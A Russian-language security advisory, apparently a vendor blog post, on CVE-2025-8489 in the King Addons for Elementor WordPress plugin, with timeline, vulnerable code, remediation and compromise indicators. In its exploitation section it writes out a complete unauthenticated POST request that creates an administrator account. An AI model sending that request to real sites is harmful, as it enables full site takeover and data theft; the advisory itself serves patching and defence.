// Безопасность / Веб

Критическая уязвимость в плагине Elementor позволяет полностью захватить WordPress-сайт

безопасность веб приложения

Критическая уязвимость в плагине Elementor позволяет полностью захватить WordPress-сайт

Критическая уязвимость в плагине King Addons for Elementor для WordPress активно эксплуатируется в реальных атаках. С момента раскрытия уже заблокировано более 48 400 попыток атак. Требуются немедленные действия для всех установок.


⚠️ Полный перехват управления без аутентификации

Специалисты по безопасности обнаружили разрушительную уязвимость в плагине King Addons for Elementor, позволяющую полностью неаутентифицированному атакующему получить административный доступ к сайту. Уязвимость затрагивает более 10 000 активных установок по всему миру и уже стала объектом массовых атак всего через один день после публичного раскрытия.

Уязвимость зарегистрирована как CVE-2025-8489 и получила максимальный рейтинг критичности — 9.8 по CVSS, что делает её одной из самых опасных уязвимостей WordPress-плагинов за весь 2025 год.
Эксплуатация позволяет злоумышленнику просто зарегистрировать новую учётную запись с правами администратора — без логина, пароля и какой-либо проверки.


📊 Технические характеристики уязвимости

ПараметрЗначение
CVECVE-2025-8489
Оценка CVSS9.8 (Critical)
Тип уязвимостиПовышение привилегий без аутентификации
Уязвимый плагинKing Addons for Elementor
Уязвимые версиис 24.12.92 по 51.1.14
Исправленная версия51.1.35
Количество установок10 000+
Статус эксплуатацииАктивно эксплуатируется
ОбнаружилPeter Thaleikis (Wordfence)
Bug Bounty$1,073.00

⏱ Таймлайн обнаружения и атак

ДатаСобытиеЗначение
24 июля 2025Первая заявка об уязвимостиЗакрытое раскрытие вендору
25 сентября 2025Выпущено исправление 51.1.35Появляется патч
30 октября 2025Публичное раскрытие WordfenceУязвимость опубликована
31 октября 2025Начало массовых атакЧерез 1 день после публикации
Декабрь 202548 400+ попыток атак заблокированоМассовые кампании

Факт: столь быстрый переход от публикации к активной эксплуатации — признак чрезвычайно высокой критичности.


🔬 Технический разбор: как работает атака

📌 Первопричина: отсутствие валидации ролей

Уязвимость возникает в механизме регистрации пользователей.
Функция handle_register_ajax() не проверяет допустимость роли пользователя, принимая значение user_role напрямую из POST-запроса.

Уязвимый фрагмент логики:

$user_role = isset($_POST['user_role']) ? sanitize_text_field($_POST['user_role']) : "";

if (!empty($user_role) && $user_role !== 'subscriber') {
    $user_data['role'] = $user_role;
}

$user_id = wp_insert_user($user_data);

❌ Проблема в том, что:

  • Нет проверки допустимых ролей
  • Разрешено любое значение, кроме subscriber
  • Можно указать administrator

✅ Санитизация sanitize_text_field() не защищает от логических атак.


🧨 Механизм эксплуатации

Атака выполняется одним POST-запросом без аутентификации:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vulnerable-wordpress-site.com
Content-Type: application/x-www-form-urlencoded

action=king_addons_user_register
&user_role=administrator
&username=attacker_account
&email=attacker@malicious.com
&password=SecurePassword123

📊 Расшифровка параметров:

ПараметрЗначениеНазначение
actionking_addons_user_registerВызов уязвимой функции
user_roleadministratorНазначение админ-прав
usernameattacker_accountЛогин
emailattacker@malicious.comE-mail
passwordSecurePassword123Пароль

✅ После этого злоумышленник легально входит в админку WordPress с полными правами.


🔥 Что происходит после взлома (Post-Exploitation)

Вектор атакиМетодПоследствия
Установка вредоносовЧерез плагины/темыКомпрометация сервера
БэкдорыПостоянный доступПолный контроль
Инъекции кодаПодмена файловПодмена контента
Кража данныхДоступ к БДУтечки PII
SEO-спамСкрытые ссылкиРепутационный ущерб
Доп. админыСоздание новых учётокЗакрепление доступа
Web ShellЗагрузка PHP-скриптовУправление сервером
Изменение конфигурацийwp-config, .htaccessНестабильность

⚠️ Важно: Бэкдоры часто остаются даже после обновления плагина — требуется полный аудит безопасности веб приложения.


🕵️‍♂️ Признаки компрометации

Тип индикатораЧто искатьГде
Подозрительные админыНеизвестные аккаунтыUsers → All Users
Логи регистрацииPOST на admin-ajax.phpAccess logs
Подозрительная активностьУстановка тем/плагиновActivity logs
Изменённые файлыwp-config.php, .htaccessFile integrity
Web ShellPHP-файлы в uploadsWeb root
Записи в БДНовые админыwp_users

🛡 План устранения (Remediation)

✅ Шаг 1: Немедленное обновление

ДействиеШагПриоритет
Проверка версииPlugins → Installed PluginsСрочно
ОбновлениеДо версии 51.1.35+Срочно
Проверка версииКонтроль после апдейтаСрочно
Очистка кэшейWordPress, сервер, CDNВысокий

✅ Шаг 2: Полный аудит безопасности

ЗадачаСтатус
1Проверить всех администраторов
2Проанализировать access-логи
3Просканировать сайт
4Проверить плагины и темы
5Проверить изменённые файлы
6Проверить таблицу wp_users
7Сбросить все пароли
8Перегенерировать security keys

🔐 Дополнительные меры защиты

КонтрольРеализацияЭффект
WAFWordfence / CloudflareБлокирует атаки
2FAДля всех админовПредотвращает вход
Контроль регистрацийCAPTCHA / запретУменьшает атаки
Мониторинг файловFile IntegrityОбнаружение бэкдоров
Минимизация правМеньше администраторовСнижение ущерба
Регулярные сканыЕженедельноРаннее выявление
АвтообновленияВключитьБыстрое закрытие дыр
ЛогированиеПолноеФорензика

📊 Оценка воздействия по типу сайта

Тип сайтаПоследствияСложность восстановленияБизнес-риск
Малый бизнесУтечки данныхСредняяВысокий
E-commerceКража платёжных данныхВысокаяКритический
МедиаПодмена контентаСредняяВысокий
Корпоративные сайтыУтечки, штрафыВысокаяКритический
Личные блогиСпам, вредоносыНизкаяСредний
Membership-сайтыУтечки подписчиковВысокаяКритический

❗ Почему эта уязвимость особенно опасна

  • Не требует аутентификации
  • Эксплуатируется одним HTTP-запросом
  • Даёт полный контроль
  • Затрагивает 10 000+ сайтов
  • Эксплуатироваться начала через 1 день после публикации
  • Устанавливает бэкдоры, переживающие обновление

📌 Wordfence уже заблокировал 48 400+ атак. Это не теория — это реальная война.


🎯 Вывод для экосистемы WordPress

Для разработчиков:

  • Никогда не доверять пользовательским данным
  • Использовать белые списки ролей
  • Минимизировать привилегии
  • Проводить security review до релиза

Для владельцев сайтов:

  • Включить автообновления
  • Удалять неиспользуемые плагины
  • Использовать Defense in Depth
  • Вести логи и мониторинг

✅ Заключение от SecurityLab.Pro

CVE-2025-8489 — это уязвимость уровня «полный захват сайта», требующая немедленных действий.
Один POST-запрос → администратор → полный контроль.

📌 Отложенная установка патча = гарантированный риск взлома.


✅ Краткий чек-лист действий:

  • ✅ Обновить King Addons for Elementor до 51.1.35+
  • ✅ Проверить всех администраторов
  • ✅ Просканировать сайт на бэкдоры
  • ✅ Сбросить все пароли
  • ✅ Перегенерировать security keys
  • ✅ Включить WAF и 2FA
  • ✅ Включить автообновления

Профильные услуги SecurityLab: тестирование на проникновение · пентест веб-приложений · Пентест CMS.

← назад в блог